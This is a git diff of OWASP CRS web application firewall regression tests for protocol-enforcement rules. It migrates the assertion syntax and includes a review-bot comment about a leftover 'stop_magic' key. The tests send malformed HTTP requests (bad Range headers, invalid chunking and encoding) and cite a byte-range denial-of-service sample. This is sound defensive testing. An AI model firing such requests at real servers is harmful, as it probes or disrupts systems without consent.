\"920170\"" + log: + no_expect_ids: [920170] - test_id: 6 desc: GET or HEAD Request with Body Content (920170) from old modsec regressions stages: @@ -112,4 +118,5 @@ tests: data: abc version: "HTTP/1.1" output: - log_contains: id "920170" + log: + expect_ids: [920170] 
diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920171.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920171.yaml index c66ae836a..e1e68b7d8 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920171.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920171.yaml @@ -25,7 +25,8 @@ tests: # encoded_request: "UE9TVCAvIEhUVFAvMS4xDQpBY2NlcHQ6ICovKg0KSG9zdDogbG9jYWxob3N0DQpUcmFuc2Zlci1FbmNvZGluZzogY2h1bmtlZA0KVXNlci1BZ2VudDogTW9kU2VjdXJpdHkgQ1JTIDMgVGVzdHMNCg0KMw0KSGkgDQozDQpDUlMNCjANCg0K" output: - no_log_contains: "id \"920171\"" + log: + no_expect_ids: [920171] - # GET Request with chunked data (invalid) test_id: 2 stages: @@ -47,7 +48,8 @@ tests: # encoded_request: "R0VUIC8gSFRUUC8xLjENCkFjY2VwdDogKi8qDQpIb3N0OiBsb2NhbGhvc3QNClRyYW5zZmVyLUVuY29kaW5nOiBjaHVua2VkDQpVc2VyLUFnZW50OiBNb2RTZWN1cml0eSBDUlMgMyBUZXN0cw0KDQozDQpIaSANCjMNCkNSUw0KMA0KDQo=" output: - log_contains: "id \"920171\"" + log: + expect_ids: [920171] - # HEAD Request with chunked data (invalid) test_id: 3 stages: @@ -69,4 +71,5 @@ tests: # encoded_request: "SEVBRCAvIEhUVFAvMS4xDQpBY2NlcHQ6ICovKg0KSG9zdDogbG9jYWxob3N0DQpUcmFuc2Zlci1FbmNvZGluZzogY2h1bmtlZA0KVXNlci1BZ2VudDogTW9kU2VjdXJpdHkgQ1JTIDMgVGVzdHMNCg0KMw0KSGkgDQozDQpDUlMNCjANCg0K" output: - log_contains: "id \"920171\"" + log: + expect_ids: [920171] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920180.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920180.yaml index f6c4546ec..0ed8225af 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920180.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920180.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, azurit" - description: "Description" rule_id: 920180 tests: - test_id: 1 
@@ -16,11 +15,12 @@ tests: Content-Type: "application/x-www-form-urlencoded" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 data: "hi=test" - stop_magic: true + autocomplete_headers: false uri: "/" version: "HTTP/1.1" output: - log_contains: id "920180" + log: + expect_ids: [920180] - test_id: 2 stages: - input: @@ -36,12 +36,13 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: id "920180" + log: + no_expect_ids: [920180] - test_id: 3 desc: POST request missing Content-Length Header (920180) from old modsec regressions stages: - input: - stop_magic: true + autocomplete_headers: false dest_addr: 127.0.0.1 headers: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 @@ -56,7 +57,8 @@ tests: uri: / version: HTTP/1.0 output: - log_contains: id "920180" + log: + expect_ids: [920180] - test_id: 4 desc: Ignore check of CT header if protocol is HTTP/2 stages: @@ -75,4 +77,5 @@ tests: uri: / version: HTTP/2.0 output: - no_log_contains: id "920180" + log: + no_expect_ids: [920180] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920181.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920181.yaml index c8f36e239..189f62708 100755 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920181.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920181.yaml @@ -1,7 +1,6 @@ --- meta: author: "fgsch" - description: "Description" rule_id: 920181 tests: - test_id: 1 @@ -18,9 +17,10 @@ tests: Content-Type: "application/x-www-form-urlencoded" Transfer-Encoding: "chunked" User-Agent: "OWASP CRS test agent" - data: "7\x0D\x0Afoo=bar\x0D\x0A0\x0D\x0A\x0D\x0A" + data: "7\x0D\x0Afoo=bar\x0D\x0A0\x0D\x0A\x0D\x0A" stop_magic: true output: # Apache unsets the Content-Length header if Transfer-Encoding is found! status: 200 - no_log_contains: id "920181" + log: + no_expect_ids: [920181] 
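Review bot: Test 1 of 920181 keeps `stop_magic: true` while the other hunks in this commit (920180 on the same line, 920170, 920240) replace that key with `autocomplete_headers: false`; if the runner no longer honours `stop_magic`, header autocompletion could add or alter a Content-Length header and change what this Content-Length/Transfer-Encoding test actually sends. Replacing the line with `autocomplete_headers: false` keeps the file consistent with the rest of the migration. The `data:` line appears as both removed and added with identical visible text, which looks like a whitespace-only change worth confirming. The test also has no `desc`, so the inline comment explaining why `status: 200` plus `no_expect_ids` is expected on Apache would be better carried as `desc: Apache unsets the Content-Length header if Transfer-Encoding is found, so the rule is not expected to fire`.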
diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920190.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920190.yaml index b4f29d6f0..86df27281 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920190.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920190.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, azurit" - description: "Description" rule_id: 920190 tests: - test_id: 1 @@ -18,7 +17,8 @@ tests: uri: "/" version: HTTP/1.1 output: - no_log_contains: id "920190" + log: + no_expect_ids: [920190] - test_id: 2 desc: 'Range: Invalid Last Byte Value (920190) from old modsec regressions' stages: @@ -38,7 +38,8 @@ tests: uri: / version: HTTP/1.1 output: - log_contains: id "920190" + log: + expect_ids: [920190] - test_id: 3 desc: "Status Page Test - Request-Range header field with range end less than range start" stages: @@ -54,4 +55,5 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: "id \"920190\"" + log: + expect_ids: [920190] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920200.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920200.yaml index 5f3be3dc6..dc322f386 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920200.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920200.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, azurit" - description: "Description" rule_id: 920200 tests: - test_id: 1 @@ -17,7 +16,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: "id \"920200\"" + log: + expect_ids: [920200] - # Sample taken from https://github.com/alienwithin/php-utilities/blob/master/apache-byte-range-server-dos/apache_byte_range_server_dos.php test_id: 2 stages: @@ -32,7 +32,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: "id \"920200\"" + log: + expect_ids: [920200] - test_id: 3 stages: - input: 
@@ -46,7 +47,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920200\"" + log: + no_expect_ids: [920200] - test_id: 4 stages: - input: @@ -60,7 +62,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: "id \"920200\"" + log: + expect_ids: [920200] - test_id: 5 stages: - input: @@ -74,7 +77,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: "id \"920200\"" + log: + expect_ids: [920200] - test_id: 6 desc: 'Range: Too many fields (920200) from old modsec regressions' stages: @@ -94,7 +98,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: id "920200" + log: + expect_ids: [920200] - test_id: 7 desc: This should PASS (PL2) stages: @@ -110,7 +115,8 @@ tests: uri: "/get/index.html" version: "HTTP/1.1" output: - no_log_contains: id "920200" + log: + no_expect_ids: [920200] - test_id: 8 desc: "This should FAIL with rule 920200 (PL2)" stages: @@ -126,7 +132,8 @@ tests: uri: "/get/index.html" version: "HTTP/1.1" output: - log_contains: id "920200" + log: + expect_ids: [920200] - test_id: 9 desc: This should PASS (PL2) stages: @@ -142,7 +149,8 @@ tests: uri: "/get/index.pdf" version: "HTTP/1.1" output: - no_log_contains: id "920200" + log: + no_expect_ids: [920200] - test_id: 10 desc: This should PASS (PL2) stages: @@ -158,4 +166,5 @@ tests: uri: "/get/index.pdf" version: "HTTP/1.1" output: - no_log_contains: id "920200" + log: + no_expect_ids: [920200] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920201.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920201.yaml index 46dd36bee..cdeed77c4 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920201.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920201.yaml @@ -19,7 +19,8 @@ tests: uri: "/get/index.pdf" version: "HTTP/1.1" output: - log_contains: id "920201" + log: + expect_ids: [920201] - test_id: 2 desc: This should FAIL with rule 920201 (PL2), filename URI encoded stages: 
@@ -35,4 +36,5 @@ tests: uri: "/get/index%2Epdf" version: "HTTP/1.1" output: - log_contains: id "920201" + log: + expect_ids: [920201] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920202.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920202.yaml index 13647827f..8e6babaca 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920202.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920202.yaml @@ -19,7 +19,8 @@ tests: uri: "/get/index.pdf" version: "HTTP/1.1" output: - log_contains: id "920202" + log: + expect_ids: [920202] - test_id: 2 desc: This should FAIL with rule 920202 (PL4), file name URI encoded stages: @@ -35,4 +36,5 @@ tests: uri: "/get/index%2Epdf" version: "HTTP/1.1" output: - log_contains: id "920202" + log: + expect_ids: [920202] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920210.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920210.yaml index b6d914fb9..69f531288 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920210.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920210.yaml @@ -17,7 +17,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920210\"" + log: + no_expect_ids: [920210] - test_id: 2 stages: - input: @@ -31,7 +32,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: "id \"920210\"" + log: + expect_ids: [920210] - test_id: 3 stages: - input: @@ -45,7 +47,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: "id \"920210\"" + log: + expect_ids: [920210] - test_id: 4 stages: - input: @@ -59,7 +62,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: "id \"920210\"" + log: + expect_ids: [920210] - test_id: 5 stages: - input: 
@@ -73,7 +77,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920210\"" + log: + no_expect_ids: [920210] - test_id: 6 desc: Multiple/Conflicting Connection Header Data Found (920210) from old modsec regressions stages: @@ -92,7 +97,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: id "920210" + log: + expect_ids: [920210] - test_id: 7 desc: Multiple/Conflicting Connection Header Data Found (920210) from old modsec regressions stages: @@ -111,4 +117,5 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: id "920210" + log: + expect_ids: [920210] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920220.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920220.yaml index 39401c384..4f321727b 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920220.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920220.yaml @@ -5,7 +5,7 @@ meta: rule_id: 920220 tests: - test_id: 1 - description: Detect invalid URI encoding in decoded URI (`%w20`) + desc: Detect invalid URI encoding in decoded URI (`%w20`) stages: - input: dest_addr: "127.0.0.1" @@ -17,9 +17,10 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: "id \"920220\"" + log: + expect_ids: [920220] - test_id: 2 - description: Detect invalid URI encoding in decoded URI (`%1G`) + desc: Detect invalid URI encoding in decoded URI (`%1G`) stages: - input: dest_addr: "127.0.0.1" @@ -31,9 +32,10 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: "id \"920220\"" + log: + expect_ids: [920220] - test_id: 3 - description: Do not trigger for valid URI encoding in decoded URI (`xyz zyx`) + desc: Do not trigger for valid URI encoding in decoded URI (`xyz zyx`) stages: - input: dest_addr: "127.0.0.1" 
@@ -45,9 +47,10 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - no_log_contains: "id \"920220\"" + log: + no_expect_ids: [920220] - test_id: 4 - description: Do not trigger for spaces encoded as `+`, which is valid + desc: Do not trigger for spaces encoded as `+`, which is valid stages: - input: dest_addr: "127.0.0.1" @@ -59,9 +62,10 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - no_log_contains: "id \"920220\"" + log: + no_expect_ids: [920220] - test_id: 5 - description: | + desc: | Detect incomplete URI encoding sequence (`bxy`, with crippled encoding of `b`). Note that the second character must not complete the `%6` to a valid sequence. stages: @@ -75,9 +79,10 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: "id \"920220\"" + log: + expect_ids: [920220] - test_id: 6 - description: Detect incomplete URI encoding sequence, single `%` (`bad%`) + desc: Detect incomplete URI encoding sequence, single `%` (`bad%`) stages: - input: dest_addr: "127.0.0.1" @@ -89,9 +94,10 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: "id \"920220\"" + log: + expect_ids: [920220] - test_id: 7 - description: Do not inspect file names for invalid URI encoding (`Taxes20%Done.txt`) + desc: Do not inspect file names for invalid URI encoding (`Taxes20%Done.txt`) stages: - input: dest_addr: "127.0.0.1" 
@@ -103,9 +109,10 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - no_log_contains: "id \"920220\"" + log: + no_expect_ids: [920220] - test_id: 8 - description: Do not inspect file names for invalid URI encoding (`Taxes20%Done.txt`), with query + desc: Do not inspect file names for invalid URI encoding (`Taxes20%Done.txt`), with query stages: - input: dest_addr: "127.0.0.1" @@ -117,4 +124,5 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - no_log_contains: "id \"920220\"" + log: + no_expect_ids: [920220] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920221.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920221.yaml index 423422384..e6e2bf592 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920221.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920221.yaml @@ -5,7 +5,7 @@ meta: rule_id: 920221 tests: - test_id: 1 - description: Detect invalid URI encoding in decoded URI (`%w20`) + desc: Detect invalid URI encoding in decoded URI (`%w20`) stages: - input: dest_addr: "127.0.0.1" @@ -17,9 +17,10 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: "id \"920221\"" + log: + expect_ids: [920221] - test_id: 2 - description: Ignore invalid URI encoding if the last path segment looks like file name (`%w20`) + desc: Ignore invalid URI encoding if the last path segment looks like file name (`%w20`) stages: - input: dest_addr: "127.0.0.1" @@ -31,4 +32,5 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - no_log_contains: "id \"920221\"" + log: + no_expect_ids: [920221] 
diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920230.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920230.yaml index 8b00df53d..1eb6b6c52 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920230.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920230.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, azurit" - description: "Description" rule_id: 920230 tests: - # From old modsec regression tests @@ -20,7 +19,8 @@ tests: Proxy-Connection: "keep-alive" version: "HTTP/1.1" output: - log_contains: "id \"920230\"" + log: + expect_ids: [920230] - # From old modsec regression tests test_id: 2 stages: @@ -37,4 +37,5 @@ tests: Proxy-Connection: "keep-alive" version: "HTTP/1.1" output: - no_log_contains: "id \"920230\"" + log: + no_expect_ids: [920230] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920240.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920240.yaml index 5197bca9a..3cea2441c 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920240.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920240.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, azurit" - description: "Description" rule_id: 920240 tests: - test_id: 1 @@ -18,10 +17,11 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 uri: "/" data: "x=new %w20$" - stop_magic: true + autocomplete_headers: false version: "HTTP/1.1" output: - log_contains: "id \"920240\"" + log: + expect_ids: [920240] - test_id: 2 stages: - input: @@ -36,10 +36,11 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 uri: "/" data: "x=new %20$" - stop_magic: true + autocomplete_headers: false version: "HTTP/1.1" output: - no_log_contains: "id \"920240\"" + log: + no_expect_ids: [920240] - test_id: 3 stages: - input: 
@@ -55,7 +56,8 @@ tests: data: "param=value" version: "HTTP/1.1" output: - no_log_contains: "id \"920240\"" + log: + no_expect_ids: [920240] - # We have a valid percent encoding here test_id: 4 stages: @@ -83,7 +85,8 @@ tests: </SOAP-ENV:Envelope> version: "HTTP/1.1" output: - no_log_contains: "id \"920240\"" + log: + no_expect_ids: [920240] - # test URL Encoding Abuse Attack Attempt from old regression tests test_id: 5 stages: @@ -102,10 +105,11 @@ tests: Content-Length: "9" uri: "/" data: "param=%1G" - stop_magic: true + autocomplete_headers: false version: "HTTP/1.1" output: - log_contains: "id \"920240\"" + log: + expect_ids: [920240] - # test URL Encoding Abuse Attack Attempt from old regression tests test_id: 6 stages: @@ -125,4 +129,5 @@ tests: data: "param=%7%6F%6D%65%74%65%78%74%5F%31%32%33%" version: "HTTP/1.1" output: - log_contains: "id \"920240\"" + log: + expect_ids: [920240] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920250.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920250.yaml index f56ff48c6..ebfc6cc54 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920250.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920250.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, azurit" - description: "Description" rule_id: 920250 tests: - # crs-setup.conf needs to have CRS_VALIDATE_UTF8_ENCODING set @@ -21,7 +20,8 @@ tests: Proxy-Connection: "keep-alive" version: "HTTP/1.1" output: - log_contains: "id \"920250\"" + log: + expect_ids: [920250] - # Taken from existing modsec regression test_id: 2 stages: @@ -38,7 +38,8 @@ tests: Proxy-Connection: "keep-alive" version: "HTTP/1.1" output: - log_contains: "id \"920250\"" + log: + expect_ids: [920250] - # Taken from existing modsec regression test_id: 3 stages: 
@@ -55,7 +56,8 @@ tests: Proxy-Connection: "keep-alive" version: "HTTP/1.1" output: - log_contains: "id \"920250\"" + log: + expect_ids: [920250] - test_id: 4 desc: "Status Page Test - Invalid UTF-8 encoding: %C2%A3 is a valid Pound sign; %E2%A3 is invalid UTF-8 (incorrect starting binary sequence)" stages: @@ -72,4 +74,5 @@ tests: Proxy-Connection: "keep-alive" version: "HTTP/1.1" output: - log_contains: "id \"920250\"" + log: + expect_ids: [920250] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920260.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920260.yaml index 4d73eb74e..074276e9f 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920260.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920260.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, azurit" - description: "Description" rule_id: 920260 tests: - test_id: 1 @@ -9,34 +8,36 @@ tests: - input: dest_addr: "127.0.0.1" port: 80 - uri: "/?test=%uff0F" + uri: "/get?test=%uff0F" headers: User-Agent: "OWASP CRS test agent" Host: "localhost" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: "id \"920260\"" + log: + expect_ids: [920260] - test_id: 2 stages: - input: dest_addr: "127.0.0.1" port: 80 - uri: "/?test=%u0F" + uri: "/get?test=%u0F" headers: User-Agent: "OWASP CRS test agent" Host: "localhost" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - no_log_contains: "id \"920260\"" - - # Test taken from existing modsec regression - test_id: 3 + log: + no_expect_ids: [920260] + - test_id: 3 + desc: Test taken from existing modsec regression stages: - input: dest_addr: "127.0.0.1" port: 80 - uri: "/?param=foo%uFF01" + uri: "/get?param=foo%uFF01" version: "HTTP/1.0" headers: User-Agent: "OWASP CRS test agent" 
@@ -46,4 +47,5 @@ tests: Keep-Alive: "300" Proxy-Connection: "keep-alive" output: - log_contains: "id \"920260\"" + log: + expect_ids: [920260] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920270.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920270.yaml index c9f7b3bd5..c962b7cb2 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920270.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920270.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, azurit" - description: "Description" rule_id: 920270 tests: - test_id: 1 @@ -16,7 +15,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: "id \"920270\"" + log: + expect_ids: [920270] - test_id: 2 stages: - input: @@ -29,7 +29,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: "id \"920270\"" + log: + expect_ids: [920270] - test_id: 3 stages: - input: @@ -42,10 +43,12 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: "id \"920270\"" - - # This causes apache to error before it gets to CRS. Therefore - # we'll mark this as a status 400 now until the FTW OR output is added - test_id: 4 + log: + expect_ids: [920270] + - test_id: 4 + desc: | + This causes apache to error before it gets to CRS. Therefore, + we'll mark this as a status 400 now until the FTW OR output is added stages: - input: dest_addr: "127.0.0.1" @@ -58,7 +61,6 @@ tests: version: "HTTP/1.1" output: status: 400 - # log_contains: "id \"920270\"" - test_id: 5 stages: - input: 
@@ -72,7 +74,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: "id \"920270\"" + log: + expect_ids: [920270] - test_id: 6 stages: - input: @@ -85,7 +88,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - no_log_contains: "id \"920270\"" + log: + no_expect_ids: [920270] - test_id: 7 stages: - input: @@ -98,7 +102,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - no_log_contains: "id \"920270\"" + log: + no_expect_ids: [920270] - test_id: 8 stages: - input: @@ -111,9 +116,10 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - no_log_contains: "id \"920270\"" - - # Test converted from old tests - test_id: 9 + log: + no_expect_ids: [920270] + - test_id: 9 + desc: Test converted from old tests stages: - input: dest_addr: "127.0.0.1" @@ -128,4 +134,5 @@ tests: Proxy-Connection: "keep-alive" version: "HTTP/1.1" output: - log_contains: "id \"920270\"" + log: + expect_ids: [920270] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920271.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920271.yaml index ce37fa41d..da227ce23 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920271.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920271.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, azurit" - description: "Description" rule_id: 920271 tests: - test_id: 1 
@@ -16,7 +15,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: "id \"920271\"" + log: + expect_ids: [920271] - test_id: 2 stages: - input: @@ -29,7 +29,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: "id \"920271\"" + log: + expect_ids: [920271] - test_id: 3 stages: - input: @@ -42,7 +43,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: "id \"920271\"" + log: + expect_ids: [920271] - test_id: 4 stages: - input: @@ -56,7 +58,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: "id \"920271\"" + log: + expect_ids: [920271] - test_id: 5 stages: - input: @@ -69,7 +72,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - no_log_contains: "id \"920271\"" + log: + no_expect_ids: [920271] - test_id: 6 stages: - input: @@ -82,4 +86,5 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - no_log_contains: "id \"920271\"" + log: + no_expect_ids: [920271] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920272.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920272.yaml index 6f350b92a..96783d5c0 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920272.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920272.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, azurit" - description: "Description" rule_id: 920272 tests: - test_id: 1 
